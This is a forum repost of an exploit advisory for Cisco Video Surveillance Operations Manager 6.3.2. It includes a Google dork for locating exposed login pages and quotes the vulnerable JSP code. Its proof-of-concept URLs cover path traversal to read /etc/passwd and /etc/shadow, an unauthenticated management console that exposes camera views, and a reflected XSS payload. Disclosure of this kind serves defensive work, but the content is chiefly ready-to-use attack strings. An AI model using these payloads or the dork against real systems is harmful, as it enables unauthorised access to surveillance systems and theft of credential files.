Gonzalez Posted March 17, 2013 Report Posted March 17, 2013 # Exploit Title:Cisco Video Surveillance Operations Manager Multiplevulnerabilities# Google Dork: intitle:"Video Surveillance Operations Manager > Login"# Date: 22 Feb 2013 reported to the vendor# Exploit Author: Bassem | bassem.co# Vendor Homepage: www.cisco.com# Version: Version 6.3.2# Tested on: Version 6.3.2#1- The application is vulnerable to Local file inclusionread_log.jsp and read_log.dep not validate the name and location of the logfile , un authenticated remote attacker can perform this---------------------------------------------read_log.jsp:/usr/BWhttpd/root/htdocs/BWT/utils/logsfrom /usr/BWhttpd/logs/<%= logName %>------------------------------------------------------------------------------------------read_log.dep<%! protected LinkedList getBwhttpdLog( String logName, String theOrder) { String logPath = "/usr/BWhttpd/logs/"; String theLog = logPath + logName; LinkedList resultList = new LinkedList(); try { BufferedReader in = new BufferedReader(newFileReader(theLog)); String theLine = ""; while( (theLine = in.readLine()) !=null ) { if(theOrder.indexOf("descending") > -1 ) {resultList.addFirst(theLine); } else {resultList.addLast(theLine); } }-----------------------------------------------POC:http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwdhttp://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow######################################################################2- The application is vulnerable to local file inclusionselect and display log not validate the log file names , If attacker pass/etc/passwd through the http post request system will display it as logfilePOC:http://serverip/monitor/logselect.php######################################################################3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn'tperform the proper authentication for the management and view console,Remote attacker can gain access to the system and view the attached cameraswithout authenticationPOC:http://serverip/broadware.jsp######################################################################4 Application is vulnerable to XSSThe web application doesn't perform validation for the inputs/outputs formany of its pages so its vulnerable to XSS attacksPOC: http://serverip/vsom/index.php/"/title><script>alert("ciscoxss");</script>--Best RegardsBassem Quote